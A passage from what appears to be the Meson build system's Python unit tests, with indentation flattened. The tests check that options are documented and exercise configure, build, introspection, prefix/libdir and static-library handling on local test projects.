self.assertEqual(args[0], 'string')
self.assertIsInstance(args[1], str)
_(None, mock.Mock(), ['string', '1'], None)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
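# Matches the run of '#' characters that starts a markdown heading; used
# below to require exactly two hash symbols per heading.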
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options():
self.assertIn(str(opt), md)
for opt in comp.base_options:
self.assertIn(str(opt), md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
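# Walk the heading matches until one titled `name` is found, then return
# the markdown between that heading and the next one (or the end of `md`).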
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
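# tee() the '###' heading matches into two independent iterators, because
# _get_section_content() consumes whichever iterator it is given.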
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS],
*[str(k) for k in mesonbuild.coredata.BUILTIN_OPTIONS_PER_MACHINE],
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_option(OptionKey('buildtype'), buildtype)
self.assertEqual(env.coredata.options[OptionKey('buildtype')].value, buildtype)
self.assertEqual(env.coredata.options[OptionKey('optimization')].value, opt)
self.assertEqual(env.coredata.options[OptionKey('debug')].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown file in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
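# The vim syntax file lists builtins in a single backslash-continued
# 'syn keyword mesonBuiltin' statement; capture the whole statement.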
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all the functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
def test_mesondata_is_up_to_date(self):
from mesonbuild.mesondata import mesondata
err_msg = textwrap.dedent('''
###########################################################
### mesonbuild.mesondata is not up-to-date ###
### Please regenerate it by running tools/gen_data.py ###
###########################################################
''')
root_dir = Path(__file__).resolve().parent
mesonbuild_dir = root_dir / 'mesonbuild'
data_dirs = mesonbuild_dir.glob('**/data')
data_files = [] # type: T.List[T.Tuple[str, str]]
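# Hash every file under mesonbuild/**/data so the result can be compared
# against the entries embedded in mesonbuild.mesondata.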
for i in data_dirs:
for p in i.iterdir():
data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())]
current_files = set(mesondata.keys())
scanned_files = set([x[0] for x in data_files])
self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n')
errors = []
for i in data_files:
if mesondata[i[0]].sha256sum != i[1]:
errors += [i[0]]
self.assertListEqual(errors, [], err_msg + 'Files were changed')
class BasePlatformTests(unittest.TestCase):
prefix = '/usr'
libdir = 'lib'
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing its stdout and stderr to stdout,
and also return the combined output.
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail
# loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
encoding='utf-8',
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix]
if self.libdir:
args += ['--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
with mock.patch.dict(os.environ, override_envvars):
run_mtest_inprocess(['-C', self.builddir])
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing its stdout and stderr to stdout,
and also return the combined output.
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of command-lines run by Meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def get_meson_log_sanitychecks(self):
'''
Same as above, but for the sanity checks that were run
'''
log = self.get_meson_log()
prefix = 'Sanity check compiler command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
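# The for/else only raises if no output line matched a known
# "nothing to do" message.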
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
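# Strip the extension and any 'lib'/'cyg' prefix to recover the Meson
# target name from an output filename.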
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '88 default options')
self.init(testdir, default_args=False, inprocess=True)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
break
else:
self.fail('Did not find option "prefix"')
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
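# Write the input to a temporary file, run do_conf_file() on it, and
# return the generated output so line endings can be compared.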
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
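# The same configuration data must render identically in the meson,
# cmake (${VAR}) and cmake@ (@VAR@) variable formats.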
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exist
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '88 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '52 run target')
self.init(testdir)
self.run_target('check_exists')
self.run_target('check-env')
self.run_target('check-env-ct')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
